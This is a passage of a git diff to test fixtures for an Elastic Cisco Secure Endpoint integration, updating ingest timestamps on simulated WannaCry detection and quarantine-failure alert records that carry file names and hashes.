"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":33000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -7164,7 +7164,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764503500Z", + "ingested": "2021-12-14T14:40:45.520893256Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -7254,7 +7254,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764508400Z", + "ingested": "2021-12-14T14:40:45.520893663Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -7344,7 +7344,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764512800Z", + "ingested": "2021-12-14T14:40:45.520894113Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":907000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -7434,7 +7434,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764517800Z", + "ingested": "2021-12-14T14:40:45.520894516Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -7524,7 +7524,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764523900Z", + "ingested": "2021-12-14T14:40:45.520894911Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":876000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -7614,7 +7614,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764527800Z", + "ingested": "2021-12-14T14:40:45.520895299Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":845000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -7704,7 +7704,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764532300Z", + "ingested": "2021-12-14T14:40:45.520895681Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":798000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -7794,7 +7794,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764538200Z", + "ingested": "2021-12-14T14:40:45.520896068Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":767000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -7884,7 +7884,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764542500Z", + "ingested": "2021-12-14T14:40:45.520896461Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -7974,7 +7974,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764547600Z", + "ingested": "2021-12-14T14:40:45.520896852Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":735000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", @@ -8067,7 +8067,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764551600Z", + "ingested": "2021-12-14T14:40:45.520897246Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", @@ -8157,7 +8157,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764556100Z", + "ingested": "2021-12-14T14:40:45.520897632Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 7fa4df7018a..2ef9d191181 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json @@ -51,7 +51,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010643900Z", + "ingested": "2021-12-14T14:40:52.874130602Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", @@ -129,7 +129,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010647500Z", + "ingested": "2021-12-14T14:40:52.874133720Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -205,7 +205,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010651300Z", + "ingested": "2021-12-14T14:40:52.874134281Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot 